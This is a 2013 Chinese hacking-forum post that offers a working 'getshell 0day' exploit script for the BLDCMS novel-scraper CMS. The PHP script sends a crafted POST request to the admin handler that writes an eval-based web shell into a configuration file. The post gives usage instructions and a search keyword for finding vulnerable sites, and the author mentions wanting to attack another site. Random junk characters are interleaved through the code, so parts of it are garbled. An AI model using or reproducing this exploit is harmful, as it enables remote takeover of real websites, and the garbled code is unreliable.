找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2222|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
4 F; j7 f$ R$ J2 H
- z' k! ]2 l, C2 {/ u2 Y ! k% m: P- w" N  i8 q, e* Z( g
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 . @( z- }( M% z. v3 `
& ~; y+ c" u4 e' C4 M
既然都有人发了 我就把我之前写好的EXP放出来吧1 D9 H! l( d. w

: d* O( Z8 f5 t3 wview source print?01.php;">; M9 v3 e+ a6 r5 e6 f6 s
02.<!--?php; t9 ^& C! r# i, d
03.echo "-------------------------------------------------------------------
6 g7 B+ j, Q( ^% V  T/ |# e5 K- K04.
5 n3 P$ O6 B9 N# }: h05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
8 p. _& t5 p: Z7 s) k  k, b$ D: D' a06. " D: P2 p2 R1 x' O4 B( H( G4 ^
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun* R9 @2 q# T( P/ h) s/ C
08.
" h, x( i! N" e3 T# l09.QQ:981009941\r\n                                2013.3.21\r\n            
/ v( ?' ]# L! {# e10.
3 q7 l) z0 v9 Q# X11. ! f$ @" I& h6 ^. A" o. O  c/ x
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
1 S, }9 y9 M* P" ?: z13.
5 T. W& Q. e8 g, a, E6 |/ D14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
/ v8 ?" t$ {4 \2 N15. 5 x3 o: |6 C' d. n  {
16.--------------------------------------------------------------------\r\n";+ b* v, f9 R+ x9 P4 K6 O; ^3 ?
17.$url=$argv[1];( Q% P) R% u9 H
18.$dir=$argv[2];
! L1 J" n3 y9 O) R5 O  N3 p8 H2 v4 I19.$pass=$argv[3];
! r* ]) l' U* [20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
' F" v* c0 Z* {3 ]0 ^- H, c3 h! Q21.if (emptyempty($pass)||emptyempty($url))5 g: U/ T+ n1 ]: N1 C* T  v% w
22.{exit("请输入参数");}) I+ [; o2 @6 C) d+ K$ \
23.else
3 H/ i$ I2 U+ y& z9 U8 U7 `24.{
# Z% A- p' X( T# k25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev0 R. E- V* J( D7 E3 w% Q2 Q1 m* m) S
26. ( B5 i$ K" H9 p6 M/ n) D2 x
27.al;9 J; ?, \% l5 j% I! O# S
28.$length = strlen($fuckdata);
7 Z5 x$ x) ?3 y  ^. D& r8 Y29.function getshell($url,$pass)
' u, ~* N# m9 x) C30.{
& D+ a4 m0 X6 o' `+ j% M. Z3 S31.global $url,$dir,$pass,$eval,$length,$fuckdata;
& R  u& Z4 o( M  b) x32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
8 l. u) V7 y5 Y) O: r; I( @33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";: M5 `- r0 i4 V; m6 x4 p
34.$header .= "User-Agent: MSIE\r\n";5 U7 L% a9 r* a1 z( c' @2 t! }3 {
35.$header .= "Host:".$url."\r\n";
5 a, q, c+ v) L36.$header .= "Content-Length: ".$length."\r\n";8 w( i9 V) [; p" r/ Z
37.$header .= "Connection: Close\r\n";
/ Q! k6 v; p6 W6 s( t6 |, p38.$header .="\r\n";4 T/ {, n. b- V- |' z
39.$header .= $fuckdata."\r\n\r\n";
. x$ R- b0 b# D8 T7 ^% O: h40.$fp = fsockopen($url, 80,$errno,$errstr,15);, F, Y7 j! v3 o3 ]( x; D$ x
41.if (!$fp)% K6 r; r" {) _6 D
42.{
7 y. a+ m. |, d43.exit ("利用失败:请检查指定目标是否能正常打开");/ I# K1 w7 [5 s
44.}
. b6 {1 C, y: H8 l2 W+ J45.else{ if (!fputs($fp,$header))2 l! s. m4 P3 Y$ S* u( r" ]5 y
46.{exit ("利用失败");}
+ A2 O; ~$ S1 v3 t6 S# E47.else8 u1 \5 K% \& M9 z
48.{
* ~: C9 _+ i" v# Y, P49.$receive = '';
) r8 F2 C- z4 V% z6 E4 v% T/ d50.while (!feof($fp)) {2 F* t) n4 t8 A6 W3 P; ]& o& H8 X. y, l
51.$receive .= @fgets($fp, 1000);! w$ @3 t# f7 N# m1 _9 a
52.}
4 a$ P  Z8 q) U& Y7 }53.@fclose($fp);
$ }2 Z; o& o) H. ^: M3 Z% j54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标- H+ [" X" Q2 E4 P3 E* R
55.
& s# l' P# Z6 A: E  @" S56.GPC是否=off)";7 H( z! ^$ |# T
57.}}
$ x+ A, p- d' V: `$ d58.}
3 W, \9 v' F4 @# ~59.}
' I. Q. X, Y- H60.getshell($url,$pass);
  F0 O6 t) T7 u0 w0 r' v61.?-->
2 B# S  Q$ q* N7 \ 8 E4 P* K7 q  d1 p# x1 n7 o

9 D" D( s$ a* ]/ h; o
4 R' |2 \  H& A: y9 Mby 数据流
/ G" u7 O- j/ c$ l9 M# C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表